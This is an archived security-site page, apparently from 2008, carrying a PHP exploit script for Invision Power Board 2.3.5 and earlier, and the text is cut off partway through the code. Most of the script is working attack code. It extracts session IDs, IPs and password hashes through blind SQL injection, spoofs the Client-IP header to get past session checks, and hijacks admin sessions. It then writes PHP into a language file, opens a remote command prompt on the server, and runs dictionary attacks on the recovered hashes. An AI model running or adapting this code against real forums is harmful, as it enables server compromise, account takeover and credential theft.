Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:20425
HistorySep 01, 2008 - 12:00 a.m.

[Exploit] Invision Power Board <= 2.3.5 Multiple Vulnerabilities

2008-09-0100:00:00
vulners.com
25

#!/usr/bin/php -q
<?php

This file requires the PhpSploit class.

If you want to use this class, the latest

version can be downloaded from acid-root.new.fr.

##################################################
error_reporting(E_ALL ^ E_NOTICE);
require('phpsploitclass.php');

yeah … it rox (:

class ipb_spl
{
var $web;

    function main&#40;&#41;
    {
            $this-&gt;mhead&#40;&#41;;
            
            # Gimme your args
            $this-&gt;p_attack = $this-&gt;get_p&#40;&#39;attack&#39;, true&#41;;
            $this-&gt;p_prox   = $this-&gt;get_p&#40;&#39;proxhost&#39;&#41;;
            $this-&gt;p_proxa  = $this-&gt;get_p&#40;&#39;proxauth&#39;&#41;;
            
            $this-&gt;init_global&#40;&#41;;
            
            # Proxy params
            if&#40; $this-&gt;p_prox &#41;
            {
                    $this-&gt;web-&gt;proxy&#40;$this-&gt;p_prox&#41;;
                    
                    if&#40; $this-&gt;p_proxa &#41;
                    $this-&gt;web-&gt;proxyauth&#40;$this-&gt;p_proxa&#41;;
            }

            # Where do we go ?
            switch&#40; $this-&gt;p_attack &#41;
            {
                    case 1:  $this-&gt;code_exec&#40;&#41;;  break;
                    case 2;  $this-&gt;bf_sql_pwd&#40;&#41;; break;
                    case 3:  $this-&gt;bf_usr_pwd&#40;&#41;; break;
                    default: $this-&gt;usage&#40;&#41;;
            }

            return;
    }
    
    function code_exec&#40;$loop=1&#41;
    {
            # First loop
            if&#40; $loop == 1 &#41;
            {
                    $this-&gt;set_sql_param&#40;&#41;;
                    $this-&gt;set_sql_focus&#40;&#41;;
            
                    $this-&gt;p_acp = $this-&gt;get_p&#40;&#39;acp&#39;&#41;;
                            
                    # ACP path
                    if&#40; !$this-&gt;p_acp &#41;
                    {
                            # If the user changed the ACP directory, we can
                            # find it &#40;if the &quot;Remove ACP Link&quot; option was not
                            # applied&#41; by log in as an Admin, and then click
                            # on &quot;Admin CP&quot;. This can be done with a user
                            # but I didn&#39;t implemented that ;&#41;
                            $this-&gt;msg&#40;&#39;Using default ACP path: admin&#39;, 1&#41;;
                            $this-&gt;p_acp = &#39;admin&#39;;
                    }
                    else 
                    $this-&gt;msg&#40;&#39;Using ACP path &quot;&#39;.$this-&gt;p_acp.&#39;&quot;&#39;, 1&#41;;
            
                    # Init client headers:
                    # Only if we have the same IP as the targeted user &#40;not admin&#41;,
                    # it resets session datas, so we try to spoof our 
                    # IP as a random one in order to keep user&#39;s session datas while
                    # we bruteforce SQL fields.
                    $this-&gt;bypass_matches&#40;&#41;;
            
                    # Remove expired sessions &#40; time&#40;&#41; - 60*60*2  =  &gt; 2 hours &#41;
                    $this-&gt;web-&gt;get&#40;$this-&gt;p_url.$this-&gt;p_acp.&#39;/index.php?&#39;&#41;;
                    $this-&gt;msg&#40;&#39;Removed all out of date admin sessions&#39;, 1&#41;;
            
                    # Cookie prefix
                    $this-&gt;get_cprefix&#40;&#41;;
            }
                            
            # Admin session ?
            $this-&gt;msg&#40;&#39;Trying to find an admin session id&#39;, 0&#41;;
            
            # Got one :]
            if&#40; $this-&gt;get_admin_sess&#40;&#41; &#41;
            {
                    $this-&gt;s_admin = true;
                    $this-&gt;s_sess  = $this-&gt;data[&#39;a_sess_id&#39;];
                    $this-&gt;a_url   = $this-&gt;p_url.$this-&gt;p_acp.&#39;/index.php?adsess=&#39;.$this-&gt;s_sess;
            }
            
            # Nothing special
            else 
            {
                    $this-&gt;s_admin = false;
                    $this-&gt;msg&#40;&#39;No admin session id found&#39;, -1&#41;;
            }
            
            # User session ?
            if&#40; !$this-&gt;s_sess &#41;
            {
                    $this-&gt;msg&#40;&#39;Trying to find a user session id&#39;, 0&#41;;
                    
                    # Yep
                    if&#40; $this-&gt;get_user_sess&#40;&#41; &#41;
                    $this-&gt;s_sess = $this-&gt;data[&#39;u_sess_id&#39;];

                    # F0ck
                    else 
                    {
                            $this-&gt;msg&#40;&#39;No user session id found&#39;, -1&#41;;
                            $this-&gt;msg&#40;&#39;Admin session &gt; 2 hours or user logged out&#39;, 0&#41;;
                            $this-&gt;msg&#40;&#39;Keeping trying until the user connects&#39;, 0&#41;;
                            $this-&gt;msg&#40;&#39;Entering loop #&#39;.$loop.&#39; ...&#39;, 0&#41;;
                            $this-&gt;code_exec&#40;++$loop&#41;;
                    }
            }
                    
            $this-&gt;msg&#40;&#39;Getting security options&#39;, 0&#41;;
            
            # Security options
            $this-&gt;get_sec_options&#40;&#41;;
            
            # IP filter ?
            if&#40; $this-&gt;conf[&#39;ip&#39;] === &#39;1&#39; &#41;
            {
                    $this-&gt;s_bypass = true;
                    
                    $this-&gt;msg&#40;&#39;IP filter option is turned on&#39;, 0&#41;;
                    
                    # Spoofing protection ?
                    if&#40; !$this-&gt;conf[&#39;xforward&#39;] &#41;
                    {
                            # Assuming our IP isn&#39;t the same etc..
                            $this-&gt;msg&#40;&#39;Can&#92;&#39;t bypass the IP filter&#39;, -1&#41;;
                            exit&#40;1&#41;;
                    }
                    
                    # X-Forwarded-For / Client-IP /
                    # Proxy-User / X-Cluster-Client-IP
                    else 
                    {
                            $this-&gt;msg&#40;&#39;Cool, we can spoof our IP &#40;Client-IP&#41;&#39;, 1&#41;;
                            
                            if&#40; $this-&gt;s_admin &#41;
                            {
                                    $this-&gt;msg&#40;&#39;Trying to find admin&#92;&#39;s last IP&#39;, 0&#41;;
                                    
                                    # Admin IP found
                                    $this-&gt;get_admin_ip&#40;&#41;;
                                    $this-&gt;s_ip = $this-&gt;data[&#39;a_ip_addr&#39;];
                            }
                            else 
                            {
                                    $this-&gt;s_admin = false;
                                    $this-&gt;msg&#40;&#39;Trying to find user&#92;&#39;s last used IP&#39;, 0&#41;;
                                    
                                    # User IP found
                                    $this-&gt;get_user_ip&#40;&#41;;
                                    $this-&gt;s_ip = $this-&gt;data[&#39;u_ip_addr&#39;];
                            }
                            
                            # Nothing found
                            if&#40; !$this-&gt;s_ip &#41;
                            {
                                    # Ahah &#40;:
                                    $this-&gt;msg&#40;&#39;No IP found for this user&#39;, -1&#41;;
                                    $this-&gt;give_hope&#40;&#41;;
                            }
                            
                            # Got one !
                            else
                            $this-&gt;msg&#40;&#39;Ok, using IP &#39;.$this-&gt;s_ip, 1&#41;;
                    }
            }
            
            # User-Agent filter ?
            if&#40; $this-&gt;conf[&#39;browser&#39;] === &#39;1&#39; &amp;&amp; !$this-&gt;s_admin &#41;
            {
                    $this-&gt;s_bypass = true;
                    
                    $this-&gt;msg&#40;&#39;Trying to find a valid user-agent&#39;, 0&#41;;
                    
                    # Good
                    if&#40; $this-&gt;get_user_agent&#40;&#41; &#41;
                    {
                            $this-&gt;msg&#40;&#39;Ok, using user-agent &#39;.substr&#40;$this-&gt;data[&#39;u_agent&#39;], 0, 10&#41;.&#39;...&#39;, 1&#41;;
                            $this-&gt;s_agent = $this-&gt;data[&#39;u_agent&#39;];
                    }
                    
                    # WTF :!
                    else
                    {
                            $this-&gt;msg&#40;&#39;No user-agent found for this user&#39;, -1&#41;;
                            $this-&gt;msg&#40;&#39;Maybe the browser didn&#92;&#39;t send this header&#39;, 0&#41;;
                            $this-&gt;s_agent = &#39;&#39;;
                    }
                    
            }

            # Cool !?
            if&#40; !$this-&gt;s_bypass &#41;
            $this-&gt;msg&#40;&#39;Cool, nothing to bypass&#39;, 1&#41;;
            
            $this-&gt;msg&#40;&#39;Trying to log in&#39;, 0&#41;;
            
            # Owned =]
            if&#40; $this-&gt;is_logged&#40;&#41; &#41;
            {
                    # PHP code
                    if&#40; $this-&gt;s_admin &#41;
                    {
                            $this-&gt;msg&#40;&#39;Logged in with an admin session&#39;, 1&#41;;
                            $this-&gt;exec_code&#40;&#41;;
                    }
                    
                    # Normal user ?
                    else
                    {
                            $this-&gt;msg&#40;&#39;Logged in with a user session&#39;, 1&#41;;
                            $this-&gt;msg&#40;&#39;You can log in using the cookie session_id&#39;, 1&#41;;

                            if&#40; $this-&gt;s_ip !== $this-&gt;def_ip &#41;
                            $this-&gt;msg&#40;&#39;Set the Client-IP header to: &#39;.$this-&gt;s_ip, 1&#41;;
                            
                            if&#40; $this-&gt;s_agent &#41;
                            $this-&gt;msg&#40;&#39;Set the User-Agent header to: &#39;.$this-&gt;s_agent, 1&#41;;
                            
                            exit&#40;0&#41;;
                    }
            }
            else 
            {
                    # Even if the admin logged out .. the admin session
                    # is still valid ;&#41;
                    $this-&gt;msg&#40;&#39;Can&#92;&#39;t log in, the session has expired ?!&#39;, -1&#41;;
                    $this-&gt;give_hope&#40;&#41;;
            }
            
            return;
    }
    
    function bf_sql_pwd&#40;&#41;
    {
            $this-&gt;p_ip    = $this-&gt;get_p&#40;&#39;ip&#39;, true&#41;;
            $this-&gt;p_dict  = $this-&gt;get_p&#40;&#39;dict&#39;, true&#41;;
            
            $this-&gt;p_sql_u = $this-&gt;get_p&#40;&#39;sqlusr&#39;&#41;;
            
            $this-&gt;p_url   = $this-&gt;get_p&#40;&#39;url&#39;&#41;;
            $this-&gt;p_uname = $this-&gt;get_p&#40;&#39;uname&#39;&#41;;
            $this-&gt;p_pwd   = $this-&gt;get_p&#40;&#39;pwd&#39;&#41;;
            // or 
            $this-&gt;p_uid   = $this-&gt;get_p&#40;&#39;uid&#39;&#41;;
            $this-&gt;p_hash  = $this-&gt;get_p&#40;&#39;passhash&#39;&#41;;
            $this-&gt;p_shold = $this-&gt;get_p&#40;&#39;stronghold&#39;&#41;;
            
            if&#40; $this-&gt;p_uname &amp;&amp; $this-&gt;p_pwd &amp;&amp; $this-&gt;p_url &#41;
            {
                    $this-&gt;get_cprefix&#40;&#41;;
                    
                    $this-&gt;msg&#40;&#39;Trying to get some cookies&#39;, 0&#41;;
                    
                    $g_dat = &#39;index.php?act=Login&amp;CODE=01&amp;CookieDate=1&#39;;
                    $p_dat = &#39;UserName=&#39;.$this-&gt;p_uname.&#39;&amp;PassWord=&#39;.$this-&gt;p_pwd.&#39;&amp;x=0&amp;y=0&#39;;
            
                    $this-&gt;web-&gt;post&#40;$this-&gt;p_url.$g_dat, $p_dat&#41;;
            
                    $this-&gt;p_uid   = $this-&gt;web-&gt;cookie[$this-&gt;s_cprefix.&#39;member_id&#39;];
                    $this-&gt;p_hash  = $this-&gt;web-&gt;cookie[$this-&gt;s_cprefix.&#39;pass_hash&#39;];
                    $this-&gt;p_shold = $this-&gt;web-&gt;cookie[$this-&gt;s_cprefix.&#39;ipb_stronghold&#39;];
            }
            elseif&#40; !$this-&gt;p_uid || !$this-&gt;p_hash || !$this-&gt;p_shold &#41;
            $this-&gt;usage&#40;&#41;;
            
            if&#40; !$this-&gt;p_uid || !$this-&gt;p_hash || !$this-&gt;p_shold &#41;
            {
                    $this-&gt;msg&#40;&#39;Can&#92;&#39;t get cookies&#39;, -1&#41;;
                    $this-&gt;msg&#40;&#39;You should try with other parameters&#39;, -1&#41;;
                    exit&#40;1&#41;;
            }
            
            $this-&gt;msg&#40;&#39;Ok, using cookies:&#39;, 1&#41;;
            
            $this-&gt;msg&#40;&#39;member_id=&#39;.$this-&gt;p_uid, 1&#41;;
            $this-&gt;msg&#40;&#39;pass_hash=&#39;.$this-&gt;p_hash, 1&#41;;
            $this-&gt;msg&#40;&#39;ipb_stronghold=&#39;.$this-&gt;p_shold, 1&#41;;
            
            if&#40; !$this-&gt;p_sql_u &#41;
            {
                    $this-&gt;set_sql_param&#40;&#41;;
                    
                    $this-&gt;msg&#40;&#39;Trying to get the current sql user&#39;, 0&#41;;
                    
                    if&#40; !$this-&gt;get_sql_user&#40;&#41; &#41;
                    {
                            $this-&gt;msg&#40;&#39;Can&#92;&#39;t get the sql user&#39;, -1&#41;;
                            $this-&gt;msg&#40;&#39;If you know the sql user, use -sqlusr&#39;, -1&#41;;
                            exit&#40;1&#41;;
                    }
                    else
                    $this-&gt;p_sql_u = $this-&gt;data[&#39;sql_user&#39;];
            }
            
            $this-&gt;msg&#40;&#39;Ok, using sql user &#39;.$this-&gt;p_sql_u, 1&#41;;
            
            $dico_c = file&#40;$this-&gt;p_dict&#41;;
            $ip_a   = explode&#40;&#39;.&#39;, $this-&gt;p_ip&#41;;
            
            $this-&gt;msg&#40;&#39;Entering local dictionnary attack &#40;&#39;.count&#40;$dico_c&#41;.&#39; words&#41;&#39;, 0&#41;;
            $this-&gt;msg&#40;&#39;You should take a drink ...&#39;, 0&#41;;
            
            foreach&#40; $dico_c as $line &#41;
            {
                    $md5 = md5&#40;trim&#40;$line&#41;.$this-&gt;p_sql_u&#41;;
                    $md5 = md5&#40;$this-&gt;p_uid.&#39;-&#39;.$ip_a[0].&#39;-&#39;.$ip_a[1].&#39;-&#39;.$this-&gt;p_hash&#41;.$md5;
                    $md5 = md5&#40;$md5&#41;;

                    if&#40; $this-&gt;p_shold === $md5 &#41;
                    {
                            $this-&gt;msg&#40;&#39;Found something cool =]&#39;, 1&#41;;
                            $this-&gt;msg&#40;&#39;SQL password: &#39;.$line, 1&#41;;
                            exit&#40;1&#41;;
                    }

            }
            
            $this-&gt;msg&#40;&#39;End of the wordlist, password not found&#39;, -1&#41;;
            
            return;
    }

    function bf_usr_pwd&#40;&#41;
    {
            $this-&gt;p_dict  = $this-&gt;get_p&#40;&#39;dict&#39;, true&#41;;

            $this-&gt;p_hash  = $this-&gt;get_p&#40;&#39;passhash&#39;&#41;;
            $this-&gt;p_salt  = $this-&gt;get_p&#40;&#39;salt&#39;&#41;;
            
            if&#40; !$this-&gt;p_hash || !$this-&gt;p_salt &#41;
            {
                    $this-&gt;set_sql_param&#40;&#41;;
                    $this-&gt;set_sql_focus&#40;&#41;;
            }
            
            if&#40; !$this-&gt;p_hash &#41;
            {
                    $this-&gt;msg&#40;&#39;Trying to get the password hash&#39;, 0&#41;;
                    
                    if&#40; !$this-&gt;get_pass_hash&#40;&#41; &#41;
                    {
                            $this-&gt;msg&#40;&#39;Can&#92;&#39;t get the password hash&#39;, -1&#41;;
                            exit&#40;1&#41;;
                    }
                    else 
                    $this-&gt;p_hash = $this-&gt;data[&#39;pass_hash&#39;];
            }
            
            $this-&gt;msg&#40;&#39;Ok, using hash &#39;.$this-&gt;p_hash, 1&#41;;
            
            if&#40; !$this-&gt;p_salt &#41;
            {
                    $this-&gt;msg&#40;&#39;Trying to get the password salt&#39;, 0&#41;;
                    
                    if&#40; !$this-&gt;get_pass_salt&#40;&#41; &#41;
                    {
                            $this-&gt;msg&#40;&#39;Can&#92;&#39;t get the password salt&#39;, -1&#41;;
                            exit&#40;1&#41;;
                    }
                    else 
                    $this-&gt;p_salt = $this-&gt;data[&#39;pass_salt&#39;];
            }
            
            $this-&gt;msg&#40;&#39;Ok, using salt &#39;.$this-&gt;p_salt, 1&#41;;
            
            $dico_c = file&#40;$this-&gt;p_dict&#41;;
            
            $this-&gt;msg&#40;&#39;Entering local dictionnary attack &#40;&#39;.count&#40;$dico_c&#41;.&#39; words&#41;&#39;, 0&#41;;
            $this-&gt;msg&#40;&#39;You should take a drink ...&#39;, 0&#41;;
            
            foreach&#40; $dico_c as $line &#41;
            {
                    if&#40; $this-&gt;p_hash === md5&#40;md5&#40;$this-&gt;p_salt&#41;.md5&#40;trim&#40;$line&#41;&#41;&#41; &#41;
                    {
                            $this-&gt;msg&#40;&#39;Found something cool =]&#39;, 1&#41;;
                            $this-&gt;msg&#40;&#39;User password: &#39;.$line, 1&#41;;
                            exit&#40;1&#41;;
                    }
            }
            
            $this-&gt;msg&#40;&#39;End of the wordlist, password not found&#39;, -1&#41;;
            
            return;
    }
    
    function set_sql_param&#40;&#41;
    {
            $this-&gt;p_url   = $this-&gt;get_p&#40;&#39;url&#39;, true&#41;;
            $this-&gt;p_pre   = $this-&gt;get_p&#40;&#39;prefix&#39;&#41;;
            
            # Table prefix
            if&#40; !$this-&gt;p_pre &#41;
            {
                    # Default table prefix if not precised
                    $this-&gt;msg&#40;&#39;Using default table prefix: ibf_&#39;, 1&#41;;
                    $this-&gt;p_pre = &#39;ibf_&#39;;
            }
            else 
            $this-&gt;msg&#40;&#39;Using table prefix &#39;.$this-&gt;p_pre, 1&#41;;

    }
    
    function set_sql_focus&#40;&#41;
    {
            $this-&gt;p_uname = $this-&gt;get_p&#40;&#39;uname&#39;&#41;;
            $this-&gt;p_uid   = $this-&gt;get_p&#40;&#39;uid&#39;&#41;;
            
            if&#40; $this-&gt;p_uname &#41;
            $this-&gt;msg&#40;&#39;Using targeted username &#39;.$this-&gt;p_uname, 1&#41;;
            
            elseif&#40; $this-&gt;p_uid &#41;
            $this-&gt;msg&#40;&#39;Using targeted user id &#39;.$this-&gt;p_uid, 1&#41;;
            
            # Target
            if&#40; !&#40;$this-&gt;p_uname || $this-&gt;p_uid&#41; &#41;
            {
                    # Default uid if not precised
                    $this-&gt;msg&#40;&#39;Using default user id: 1&#39;, 1&#41;;
                    $this-&gt;p_uid = 1;
            }

            # Focus on ?
            if&#40; $this-&gt;p_uname &#41;
            $this-&gt;t_on = &#39;members_l_username=&#92;&#39;&#39;.addslashes&#40;$this-&gt;p_uname&#41;.&#39;&#92;&#39;&#39;;
            
            else 
            $this-&gt;t_on = &#39;id=&#39;.&#40;int&#41;$this-&gt;p_uid;
            
            return;
    }
    
    function exec_code&#40;&#41;
    {
            $this-&gt;write_code&#40;&#41;;
            
            while&#40; $this-&gt;cmd_prompt&#40;&#41; &#41;
            {
                    $this-&gt;web-&gt;addheader&#40;&#39;My-Code&#39;, $this-&gt;cmd&#41;;
                    $this-&gt;web-&gt;get&#40;$this-&gt;p_url&#41;;

                    print &quot;&#92;n&quot;.$this-&gt;get_answer&#40;&#41;;
            }
            
            exit&#40;0&#41;;
    }
    
    function get_answer&#40;&#41;
    {
            $res_a = explode&#40;$this-&gt;res_sep, $this-&gt;web-&gt;getcontent&#40;&#41;&#41;;
            
            if&#40; !$res_a[1] &#41;
            return &#39;No result to retrieve&#39;;
            
            else 
            return $res_a[1];
    }
    
    function cmd_prompt&#40;&#41;
    {
            $this-&gt;cmd = $this-&gt;msg&#40;&#39;root@ipb: &#39;, 1, 1, 0, true&#41;;
            
            if&#40; !ereg&#40;&#39;^&#40;quit|exit&#41;$&#39;, $this-&gt;cmd&#41; &#41;
            {               
                    $this-&gt;cmd = base64_encode&#40;$this-&gt;cmd&#41;;
                    $this-&gt;cmd = str_replace&#40;&#39;&#37;CMD&#37;&#39;, $this-&gt;cmd, $this-&gt;php_send&#41;;
                    
                    return TRUE;
            }

            else
               return FALSE;
    }
    
    function write_code&#40;&#41;
    {
            # Gimme the language ID
            $this-&gt;get_def_lang&#40;&#41;;
            
            # Current lang settings
            $p_dat =
            &#39;code=edit2&amp;act=lang&amp;id=&#39;.$this-&gt;g_lid.&#39;&amp;section&#39;.
            &#39;=lookandfeel&amp;lang_file=lang_boards.php&#39;;
            
            $this-&gt;web-&gt;post&#40;$this-&gt;a_url, $p_dat&#41;;

            # We collect each variable name / value
            if&#40; preg_match_all&#40;$this-&gt;reg_lvar, $this-&gt;web-&gt;getcontent&#40;&#41;, $l_vars&#41; &#41;
            {
                    # POST data 
                    $p_dat =
                    &#39;code=doedit&amp;act=lang&amp;id=&#39;.$this-&gt;g_lid.
                    &#39;&amp;lang_file=lang_boards.php&amp;section=lo&#39;.
                    &#39;okandfeel&amp;&#39;;

                    # &amp;Name=Value
                    for&#40; $i=0; $i&lt;count&#40;$l_vars[0]&#41;; $i++ &#41;
                    {
                            $p_dat .=
                            &#39;&amp;XX_&#39;.$l_vars[1][$i].&#39;=&#39;.urlencode&#40;$l_vars[2][$i]&#41;;
                            
                            # We write our PHP code in the first variable
                            if&#40; $i == 0 &#41;
                            $p_dat .= $this-&gt;php_write;
                    }
                    
                    # Go on
                    $this-&gt;web-&gt;post&#40;$this-&gt;a_url, $p_dat&#41;;
                    
                    $this-&gt;msg&#40;&#39;PHP code written&#39;, 1&#41;;
            }
            else
            {
                    # WTF :!
                    $this-&gt;msg&#40;&#39;Can&#92;&#39;t find block variables&#39;, 0&#41;;
                    exit&#40;1&#41;;
            }
            
            return;
    }
    
    function get_def_lang&#40;&#41;
    {
            $this-&gt;msg&#40;&#39;Trying to get the set language id&#39;, 0&#41;;
            
            $this-&gt;web-&gt;get&#40;$this-&gt;a_url.&#39;&amp;section=lookandfeel&amp;act=lang&#39;&#41;;
            
            if&#40; preg_match&#40;$this-&gt;reg_lang, $this-&gt;web-&gt;getcontent&#40;&#41;, $lids&#41; &#41;
            {
                    $this-&gt;g_lid = $lids[1];
                    $this-&gt;msg&#40;&#39;Using language id &#39;.$this-&gt;g_lid, 1&#41;;
            }
            else 
            {
                    $this-&gt;msg&#40;&#39;Can&#92;&#39;t get the default language id&#39;, -1&#41;;
                    exit&#40;1&#41;;
            }
            
            return;
    }
    
    function is_logged&#40;&#41;
    {
            $this-&gt;bypass_matches&#40;&#41;;

            # User session ok ?
            if&#40; !$this-&gt;s_admin &#41;
            {
                    $match = &#39;act=Login&amp;amp;CODE=03&#39;;
                    $this-&gt;web-&gt;addcookie&#40;$this-&gt;s_cprefix.&#39;session_id&#39;, $this-&gt;s_sess&#41;;
                    $this-&gt;web-&gt;get&#40;$this-&gt;p_url&#41;;
            }
            
            # Admin session ok ?
            else
            {
                    $match = &#39;&amp;section=&#39;;
                    $this-&gt;web-&gt;get&#40;$this-&gt;a_url&#41;;
            }
            
            if&#40; preg_match&#40;&quot;/$match/i&quot;, $this-&gt;web-&gt;getcontent&#40;&#41;&#41; &#41;
            return true;
            
            else 
            return false;           
    }
    
    function bypass_matches&#40;&#41;
    {
            # match_browser
            $this-&gt;web-&gt;agent&#40;$this-&gt;s_agent&#41;;
            
            # match_ipaddress
            $this-&gt;web-&gt;addheader&#40;&#39;Client-IP&#39;, $this-&gt;s_ip&#41;;
            
            return;
    }
    
    function get_cprefix&#40;&#41;
    {
            $this-&gt;msg&#40;&#39;Trying to get the cookie prefix&#39;, 0&#41;;
                            
            # Set-Cookie: session_id=...; path=/
            $this-&gt;web-&gt;get&#40;$this-&gt;p_url&#41;;
            
            $this-&gt;s_cprefix = &#39;&#39;;
            
            if&#40; $this-&gt;web-&gt;cookie &#41;
            {
                    foreach&#40; $this-&gt;web-&gt;cookie as $name =&gt; $value&#41;
                    {
                            if&#40; preg_match&#40;$this-&gt;reg_cpre, $name, $cmatches&#41; &#41;
                            {
                                    $this-&gt;s_cprefix = $cmatches[1];
                                    break;
                            }
                    }
            }
            
            if&#40; !$this-&gt;s_cprefix &#41;
            $this-&gt;msg&#40;&#39;No cookie prefix set&#39;, 1&#41;;
            
            else 
            $this-&gt;msg&#40;&#39;Using cookie prefix &#39;.$this-&gt;s_cprefix, 1&#41;;
            
            return;
    }
    
    function get_sec_options&#40;&#41;
    {
            # If no value, take the default one
            $this-&gt;get_conf&#40;&#39;t.conf_value&#39;&#41;;
            $this-&gt;get_conf&#40;&#39;t.conf_default&#39;&#41;;
            
            return;
    }
    
    function get_conf&#40;$field&#41;
    {
            $this-&gt;init_sql&#40;&#41;;
            
            $this-&gt;t_table = &#39;conf_settings&#39;;       
            $this-&gt;t_field = $field;
            $this-&gt;t_char  = $this-&gt;chr_num;
            
            $this-&gt;t_add_0 = &quot;AND t.conf_key=&#39;match_browser&#39;&quot;;

            if&#40; $this-&gt;conf[&#39;browser&#39;] === &#39;&#39; &#41;
            $this-&gt;conf[&#39;browser&#39;] = $this-&gt;bf_inj&#40;&#41;;

            $this-&gt;t_add_0 = &quot;AND t.conf_key=&#39;match_ipaddress&#39;&quot;;
            
            if&#40; $this-&gt;conf[&#39;ip&#39;] === &#39;&#39; &#41;
            $this-&gt;conf[&#39;ip&#39;] = $this-&gt;bf_inj&#40;&#41;;
            
            $this-&gt;t_add_0 = &quot;AND t.conf_key=&#39;xforward_matching&#39;&quot;;
            
            if&#40; $this-&gt;conf[&#39;xforward&#39;] === &#39;&#39; &#41;
            $this-&gt;conf[&#39;xforward&#39;] = $this-&gt;bf_inj&#40;&#41;;

            return;
    }
    
    function get_login_key&#40;&#41;
    {
            $this-&gt;init_sql&#40;&#41;;
            
            $this-&gt;t_key             = &#39;login_key&#39;;
            $this-&gt;t_table           = &#39;members&#39;;
            $this-&gt;t_field           = &#39;t.member_login_key&#39;;
            $this-&gt;t_join            = &#39;t.id=m.id&#39;;
            $this-&gt;t_char            = $this-&gt;chr_md5;
            $this-&gt;data[&#39;login_key&#39;] = $this-&gt;bf_inj&#40;&#41;;
            
            return $this-&gt;key_val;
    }
    
    function get_sql_user&#40;&#41;
    {
            $this-&gt;init_sql&#40;&#41;;
            
            $this-&gt;t_key             = &#39;user&#40;&#41;&#39;;
            $this-&gt;t_table           = &#39;members&#39;;
            $this-&gt;t_field           = &#39;user&#40;&#41;&#39;;
            $this-&gt;t_char            = $this-&gt;chr_all;
            $this-&gt;t_end             = &#39;@&#39;;
            $this-&gt;data[&#39;sql_user&#39;]  = $this-&gt;bf_inj&#40;&#41;;
            
            return $this-&gt;key_val;
    }
    
    function get_pass_hash&#40;&#41;
    {
            $this-&gt;init_sql&#40;&#41;;
            
            $this-&gt;t_key             = &#39;pass_hash&#39;;
            $this-&gt;t_table           = &#39;members_converge&#39;;
            $this-&gt;t_field           = &#39;t.converge_pass_hash&#39;;
            $this-&gt;t_join            = &#39;t.converge_email=m.email&#39;;
            $this-&gt;t_char            = $this-&gt;chr_md5;
            $this-&gt;data[&#39;pass_hash&#39;] = $this-&gt;bf_inj&#40;&#41;;
            
            return $this-&gt;key_val;
    }
    
    function get_pass_salt&#40;&#41;
    {       
            $this-&gt;init_sql&#40;&#41;;
            
            $this-&gt;t_key             = &#39;pass_salt&#39;;
            $this-&gt;t_table           = &#39;members_converge&#39;;
            $this-&gt;t_field           = &#39;t.converge_pass_salt&#39;;
            $this-&gt;t_join            = &#39;t.converge_email=m.email&#39;;
            $this-&gt;t_char            = $this-&gt;chr_all;
            $this-&gt;data[&#39;pass_salt&#39;] = $this-&gt;bf_inj&#40;&#41;;
            
            return $this-&gt;key_val;
    }
    
    function get_admin_sess&#40;&#41;
    {
            $this-&gt;init_sql&#40;&#41;;
            
            $this-&gt;t_key             = &#39;admin_sid&#39;;
            $this-&gt;t_table           = &#39;admin_sessions&#39;;
            $this-&gt;t_field           = &#39;t.session_id&#39;;
            $this-&gt;t_join            = &#39;t.session_member_id=m.id&#39;;
            $this-&gt;t_sel             = &#39;t.session_log_in_time&#39;;
            $this-&gt;t_char            = $this-&gt;chr_md5;
            $this-&gt;data[&#39;a_sess_id&#39;] = $this-&gt;bf_inj&#40;&#41;;
            
            return $this-&gt;key_val;
    }
    
    function get_admin_ip&#40;&#41;
    {
            $this-&gt;init_sql&#40;&#41;;
            
            $this-&gt;t_key             = &#39;admin_ip&#39;;
            $this-&gt;t_table           = &#39;admin_sessions&#39;;
            $this-&gt;t_field           = &#39;t.session_ip_address&#39;;
            $this-&gt;t_join            = &#39;t.session_member_id=m.id&#39;;
            $this-&gt;t_sel             = &#39;t.session_log_in_time&#39;;
            $this-&gt;t_char            = $this-&gt;chr_ip;
            $this-&gt;data[&#39;a_ip_addr&#39;] = $this-&gt;bf_inj&#40;&#41;;
            
            return $this-&gt;key_val;
    }
    
    function get_admin_pwd&#40;&#41;
    {
            $this-&gt;init_sql&#40;&#41;;
            
            $this-&gt;t_key             = &#39;admin_pwd&#39;;
            $this-&gt;t_table           = &#39;admin_login_logs&#39;;
            $this-&gt;t_field           = &#39;t.admin_post_details&#39;;
            $this-&gt;t_join            = &#39;t.admin_username=m.members_l_username&#39;;
            $this-&gt;t_sel             = &#39;t.admin_id&#39;;
            $this-&gt;t_end             = &#39;&quot;&#39;;
            $this-&gt;t_bchar           = -4; # &quot;;}}
            $this-&gt;t_char            = $this-&gt;chr_all;
            $this-&gt;data[&#39;a_pwd_like&#39;]= $this-&gt;bf_inj&#40;&#41;;
            
            return $this-&gt;key_val;
    }
    
    function get_user_sess&#40;&#41;
    {
            $this-&gt;init_sql&#40;&#41;;
            
            $this-&gt;t_key             = &#39;user_sid&#39;;
            $this-&gt;t_table           = &#39;sessions&#39;;
            $this-&gt;t_field           = &#39;t.id&#39;;
            $this-&gt;t_join            = &#39;t.member_id=m.id&#39;;
            $this-&gt;t_sel             = &#39;t.running_time&#39;;
            $this-&gt;t_char            = $this-&gt;chr_md5;
            $this-&gt;data[&#39;u_sess_id&#39;] = $this-&gt;bf_inj&#40;&#41;;
            
            return $this-&gt;key_val;
    }
    
    function get_user_ip&#40;&#41;
    {
            $this-&gt;init_sql&#40;&#41;;
            
            $this-&gt;t_key             = &#39;user_ip&#39;;
            $this-&gt;t_table           = &#39;sessions&#39;;
            $this-&gt;t_field           = &#39;t.ip_address&#39;;
            $this-&gt;t_join            = &#39;t.member_id=m.id&#39;;
            $this-&gt;t_sel             = &#39;t.running_time&#39;;
            $this-&gt;t_char            = $this-&gt;chr_ip;
            $this-&gt;data[&#39;u_ip_addr&#39;] = $this-&gt;bf_inj&#40;&#41;;
            
            return $this-&gt;key_val;
    }
    
    function get_user_agent&#40;&#41;
    {
            $this-&gt;init_sql&#40;&#41;;
            
            $this-&gt;t_key             = &#39;user_agent&#39;;
            $this-&gt;t_table           = &#39;sessions&#39;;
            $this-&gt;t_field           = &#39;t.browser&#39;;
            $this-&gt;t_join            = &#39;t.member_id=m.id&#39;;
            $this-&gt;t_sel             = &#39;t.running_time&#39;;
            $this-&gt;t_char            = $this-&gt;chr_all;
            $this-&gt;data[&#39;u_agent&#39;]   = $this-&gt;bf_inj&#40;&#41;;
            
            return $this-&gt;key_val;
    }
    
    function init_sql&#40;&#41;
    {
            # SQL Injection params
            $this-&gt;t_end   = null;
            $this-&gt;t_add_0 = &#39;&#39;;
